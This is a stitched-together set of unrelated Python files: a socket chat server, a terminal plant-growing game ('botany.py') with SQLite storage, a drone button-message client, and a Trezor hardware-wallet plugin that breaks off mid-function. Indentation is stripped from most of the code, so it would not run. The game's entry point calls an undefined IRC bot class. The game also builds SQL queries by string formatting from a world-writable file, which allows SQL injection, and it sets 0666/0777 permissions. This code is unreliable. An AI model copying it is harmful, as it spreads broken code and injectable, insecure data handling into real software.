import socket
import time
from threading import Thread
users = []
len_сhar = 8  # number of bytes used to encode the number of characters in a message
len_name = 10  # maximum length of a login name
len_sec = 16  # number of bytes used to encode the seconds timestamp
ip = '127.0.0.1'
port = 7777
def creation_sock():
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((ip, port))
server_socket.listen()
print("Старт сервера")
while True:
user_sock, user_ip = server_socket.accept()
Thread(target=new_connection, args=(user_sock, user_ip, )).start()
def current_time(sec):
current_time = time.strftime('%H:%M', time.localtime(sec))
return current_time
def new_connection(user_sock, user_ip):
users.append(user_sock)
print(f"К нам подключился новый юзер {user_ip[0]}:{user_ip[1]}")
accept_and_send_a_message(user_sock, user_ip)
def check_length(sock, content, length):
    # bytes objects are immutable, so accumulate locally and return the result
    while len(content) < length:
        chunk = sock.recv(length - len(content))
        if not chunk:
            break
        content += chunk
    return content
def get_message(user_sock):
while True:
try:
header = user_sock.recv(len_сhar + len_name)
except Exception:
return
if not header:
return
        header = check_length(user_sock, header, len_сhar + len_name)
header = header.decode('utf-8')
header_len_char = header[:len_сhar]
try:
int(header_len_char)
except ValueError:
continue
header_len_char = int(header_len_char)
header_name = header[len_сhar:].strip()
        message = user_sock.recv(header_len_char)
        message = check_length(user_sock, message, header_len_char)
message = message.decode('utf-8')
return {"len": header_len_char, "name": header_name, "time": message}
def accept_and_send_a_message(user_sock, user_ip):
while True:
message = get_message(user_sock)
sec = int(time.time())
server_formatted_time = current_time(sec)
if not message:
user_sock.shutdown(socket.SHUT_WR)
user_sock.close()
print(f"Пользователь отключился {user_ip[0]}:{user_ip[1]}")
users.remove(user_sock)
return
print(f"Получено {message['name']} {server_formatted_time}: {message['time']}")
header_to_send = f"{message['len']:<{len_сhar}}{message['name']:<{len_name}}{sec:<{len_sec}}"
message_to_send = header_to_send + message['time']
message_to_send = message_to_send.encode('utf-8')
for user in users:
if user != user_sock:
try:
user.send(message_to_send)
except Exception:
user.close()
users.remove(user)
continue
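# Hedged illustration (not used by the server): how a client is expected to
# frame an outgoing message given the constants above -- a text-length field
# padded to len_сhar characters, a login field padded to len_name characters,
# then the UTF-8 encoded text. Logins longer than the field width or containing
# non-ASCII characters would break the fixed-width framing, so this sketch
# assumes a short ASCII login.
def example_client_frame(name, text):
    encoded = text.encode('utf-8')
    header = f"{len(encoded):<{len_сhar}}{name:<{len_name}}"
    return header.encode('utf-8') + encoded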
def main():
creation_sock()
if __name__ == '__main__':
main()
|
botany.py
|
#!/usr/bin/python2
from __future__ import division
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2/3)*CONST_RARITY_MAX)
uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
for name in (visitor_names):
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name))
data=c.fetchone()
if data is None:
sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name)
c.execute(sql)
else:
sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name)
c.execute(sql)
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] < int(time.time()):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
                except Exception:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Increase plant growth stage
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
adjusted_sleep_time = 1 / (1 + generation_bonus)
time.sleep(adjusted_sleep_time)
class DataManager(object):
# handles user data, puts a .botany dir in user's home dir (OSX/Linux)
# handles shared data with sqlite db
# TODO: .dat save should only happen on mutation, water, death, exit,
# harvest, otherwise
# data hasn't changed...
# can write json whenever bc this isn't ever read for data within botany
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
game_dir = os.path.dirname(os.path.realpath(__file__))
this_user = getpass.getuser()
savefile_name = this_user + '_plant.dat'
savefile_path = os.path.join(botany_dir, savefile_name)
#set this.savefile_path to guest_garden path
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
garden_json_path = os.path.join(game_dir, 'garden_file.json')
harvest_file_path = os.path.join(botany_dir, 'harvest_file.dat')
harvest_json_path = os.path.join(botany_dir, 'harvest_file.json')
def __init__(self):
self.this_user = getpass.getuser()
# check if instance is already running
# check for .botany dir in home
try:
os.makedirs(self.botany_dir)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
self.savefile_name = self.this_user + '_plant.dat'
def check_plant(self):
# check for existing save file
if os.path.isfile(self.savefile_path):
return True
else:
return False
def start_threads(self,this_plant):
# creates threads to save files every minute
death_check_thread = threading.Thread(target=self.death_check_update, args=(this_plant,))
death_check_thread.daemon = True
death_check_thread.start()
autosave_thread = threading.Thread(target=self.autosave, args=(this_plant,))
autosave_thread.daemon = True
autosave_thread.start()
def death_check_update(self,this_plant):
# .1 second updates and lock to minimize race condition
while True:
is_dead = this_plant.dead_check()
if is_dead:
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
self.harvest_plant(this_plant)
this_plant.unlock_new_creation()
time.sleep(.1)
def autosave(self, this_plant):
# running on thread, saves plant every 5s TODO: this is unnecessary
# and breaks shit probably
file_update_count = 0
while True:
file_update_count += 1
self.save_plant(this_plant)
self.data_write_json(this_plant)
self.update_garden_db(this_plant)
if file_update_count == 12:
# only update garden json every 60s
self.update_garden_json()
time.sleep(5)
file_update_count %= 12
def load_plant(self):
# load savefile
with open(self.savefile_path, 'rb') as f:
this_plant = pickle.load(f)
# migrate data structure to create data for empty/nonexistent plant
# properties
this_plant.migrate_properties()
# get status since last login
is_dead = this_plant.dead_check()
is_watered = this_plant.water_check()
if not is_dead:
if is_watered:
time_delta_last = int(time.time()) - this_plant.last_time
ticks_to_add = min(time_delta_last, 24*3600)
this_plant.time_delta_watered = 0
self.last_water_gain = time.time()
else:
ticks_to_add = 0
this_plant.ticks += ticks_to_add * (0.2 * (this_plant.generation - 1) + 1)
return this_plant
def plant_age_convert(self,this_plant):
# human-readable plant age
age_seconds = int(time.time()) - this_plant.start_time
days, age_seconds = divmod(age_seconds, 24 * 60 * 60)
hours, age_seconds = divmod(age_seconds, 60 * 60)
minutes, age_seconds = divmod(age_seconds, 60)
age_formatted = ("%dd:%dh:%dm:%ds" % (days, hours, minutes, age_seconds))
return age_formatted
def init_database(self):
# check if dir exists, create sqlite directory and set OS permissions to 777
sqlite_dir_path = os.path.join(self.game_dir,'sqlite')
if not os.path.exists(sqlite_dir_path):
os.makedirs(sqlite_dir_path)
os.chmod(sqlite_dir_path, 0777)
conn = sqlite3.connect(self.garden_db_path)
init_table_string = """CREATE TABLE IF NOT EXISTS garden (
plant_id tinytext PRIMARY KEY,
owner text,
description text,
age text,
score integer,
is_dead numeric
)"""
c = conn.cursor()
c.execute(init_table_string)
conn.close()
# init only, creates and sets permissions for garden db and json
if os.stat(self.garden_db_path).st_uid == os.getuid():
os.chmod(self.garden_db_path, 0666)
open(self.garden_json_path, 'a').close()
os.chmod(self.garden_json_path, 0666)
def migrate_database(self):
conn = sqlite3.connect(self.garden_db_path)
migrate_table_string = """CREATE TABLE IF NOT EXISTS visitors (
id integer PRIMARY KEY,
garden_name text,
visitor_name text,
weekly_visits integer
)"""
c = conn.cursor()
c.execute(migrate_table_string)
conn.close()
return True
def update_garden_db(self, this_plant):
# insert or update this plant id's entry in DB
# TODO: make sure other instances of user are deleted
# Could create a clean db function
self.init_database()
self.migrate_database()
age_formatted = self.plant_age_convert(this_plant)
conn = sqlite3.connect(self.garden_db_path)
c = conn.cursor()
# try to insert or replace
update_query = """INSERT OR REPLACE INTO garden (
plant_id, owner, description, age, score, is_dead
) VALUES (
'{pid}', '{pown}', '{pdes}', '{page}', {psco}, {pdead}
)
""".format(pid = this_plant.plant_id,
pown = this_plant.owner,
pdes = this_plant.parse_plant(),
page = age_formatted,
psco = str(this_plant.ticks),
pdead = int(this_plant.dead))
c.execute(update_query)
conn.commit()
conn.close()
def retrieve_garden_from_db(self):
# Builds a dict of dicts from garden sqlite db
garden_dict = {}
conn = sqlite3.connect(self.garden_db_path)
# Need to allow write permissions by others
conn.row_factory = sqlite3.Row
c = conn.cursor()
c.execute('SELECT * FROM garden ORDER BY owner')
tuple_list = c.fetchall()
conn.close()
# Building dict from table rows
for item in tuple_list:
garden_dict[item[0]] = {
"owner":item[1],
"description":item[2],
"age":item[3],
"score":item[4],
"dead":item[5],
}
return garden_dict
def update_garden_json(self):
this_garden = self.retrieve_garden_from_db()
with open(self.garden_json_path, 'w') as outfile:
json.dump(this_garden, outfile)
pass
def save_plant(self, this_plant):
# create savefile
this_plant.last_time = int(time.time())
temp_path = self.savefile_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_plant, f, protocol=2)
os.rename(temp_path, self.savefile_path)
def data_write_json(self, this_plant):
# create personal json file for user to use outside of the game (website?)
json_file = os.path.join(self.botany_dir,self.this_user + '_plant_data.json')
# also updates age
age_formatted = self.plant_age_convert(this_plant)
plant_info = {
"owner":this_plant.owner,
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
"is_dead":this_plant.dead,
"last_watered":this_plant.watered_timestamp,
"file_name":this_plant.file_name,
"stage": this_plant.stage_list[this_plant.stage],
"generation": this_plant.generation,
}
if this_plant.stage >= 3:
plant_info["rarity"] = this_plant.rarity_list[this_plant.rarity]
if this_plant.mutation != 0:
plant_info["mutation"] = this_plant.mutation_list[this_plant.mutation]
if this_plant.stage >= 4:
plant_info["color"] = this_plant.color_list[this_plant.color]
if this_plant.stage >= 2:
plant_info["species"] = this_plant.species_list[this_plant.species]
with open(json_file, 'w') as outfile:
json.dump(plant_info, outfile)
def harvest_plant(self, this_plant):
# TODO: plant history feature - could just use a sqlite query to retrieve all of user's dead plants
# harvest is a dict of dicts
# harvest contains one entry for each plant id
age_formatted = self.plant_age_convert(this_plant)
this_plant_id = this_plant.plant_id
plant_info = {
"description":this_plant.parse_plant(),
"age":age_formatted,
"score":this_plant.ticks,
}
if os.path.isfile(self.harvest_file_path):
# harvest file exists: load data
with open(self.harvest_file_path, 'rb') as f:
this_harvest = pickle.load(f)
new_file_check = False
else:
this_harvest = {}
new_file_check = True
this_harvest[this_plant_id] = plant_info
# dump harvest file
temp_path = self.harvest_file_path + ".temp"
with open(temp_path, 'wb') as f:
pickle.dump(this_harvest, f, protocol=2)
os.rename(temp_path, self.harvest_file_path)
# dump json file
with open(self.harvest_json_path, 'w') as outfile:
json.dump(this_harvest, outfile)
return new_file_check
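# Hedged standalone sketch (not part of the original game): reproduces the
# watering-gap rule from Plant.guest_check() in isolation. Given a list of
# watering timestamps, the effective "last watered" time is the latest
# timestamp that comes before the first gap of more than five days.
def example_last_valid_watering(timestamps):
    timestamps = sorted(timestamps)
    diffs = [(j - i) / 86400.0 for i, j in zip(timestamps[:-1], timestamps[1:])]
    first_big_gap = next((x for x in diffs if x > 5), None)
    if first_big_gap is None:
        # no gap over five days, the newest timestamp wins
        return timestamps[-1]
    return timestamps[:diffs.index(first_big_gap) + 1][-1]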
if __name__ == '__main__':
import sys
if len(sys.argv) != 4:
print("Usage: botany.py <server[:port]> <owner> <nickname>")
sys.exit(1)
s = sys.argv[1].split(":", 1)
server = s[0]
if len(s) == 2:
try:
port = int(s[1])
except ValueError:
print("Error: Erroneous port.")
sys.exit(1)
else:
port = 6667
channel = sys.argv[2]
nickname = sys.argv[3]
print("initialising plant data")
my_data = DataManager()
# if plant save file exists
if my_data.check_plant():
my_plant = my_data.load_plant()
# otherwise create new plant
else:
my_plant = Plant(my_data.savefile_path)
my_data.data_write_json(my_plant)
# my_plant is either a fresh plant or an existing plant at this point
my_plant.start_life()
my_data.start_threads(my_plant)
print("initialising irc connection")
print("connecting to %s:%d as %s, with owner %s" % (server, port, nickname, channel))
bot = BotanyBot(nickname, channel, server, port, my_plant,my_data)
bot.start()
|
btn_client.py
|
#!/usr/bin/env python
import socket
import struct
import threading
from sololink import btn_msg
HOST = "10.1.1.1"
PORT = 5016
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "connecting to", HOST, ":", PORT, "...",
s.connect((HOST, PORT))
print "OK"
def in_thread(s):
while True:
msg = btn_msg.recv(s)
if msg is None:
print "received \"None\""
break
elif len(msg) != 4:
print "received funky message: ", str(msg)
else:
print "received:", msg[0], \
btn_msg.ButtonName[msg[1]], \
btn_msg.EventName[msg[2]], msg[3]
if btn_msg.msg_buf_long != 0:
print "btn_msg.msg_buf_long=%d!" % btn_msg.msg_buf_long
btn_msg.msg_buf_long = 0
if btn_msg.msg_buf_short != 0:
print "btn_msg.msg_buf_short=%d!" % btn_msg.msg_buf_short
btn_msg.msg_buf_short = 0
in_id = threading.Thread(target=in_thread, args=(s,))
in_id.daemon = True
in_id.start()
format = 1
while True:
desc = raw_input()
# allow changing which message goes out
if desc == "1":
format = 1
        continue
elif desc == "2":
format = 2
        continue
if format == 1:
button_id = btn_msg.ButtonA
shot_id = 0
btn_msg.sendArtooString(s, button_id, shot_id, desc + "\0")
elif format == 2:
btn_msg.sendShotString(s, desc + "\0")
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'trezorlib'):
_logger.exception('error importing trezor plugin deps')
TREZORLIB = False
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 12, 0)
maximum_library = (0, 13)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
@runs_in_hwd_thread
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
@runs_in_hwd_thread
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Avian"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.").format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.daemon = True
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items()}
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
details = SignTx(lock_time=tx.locktime, version=tx.version)
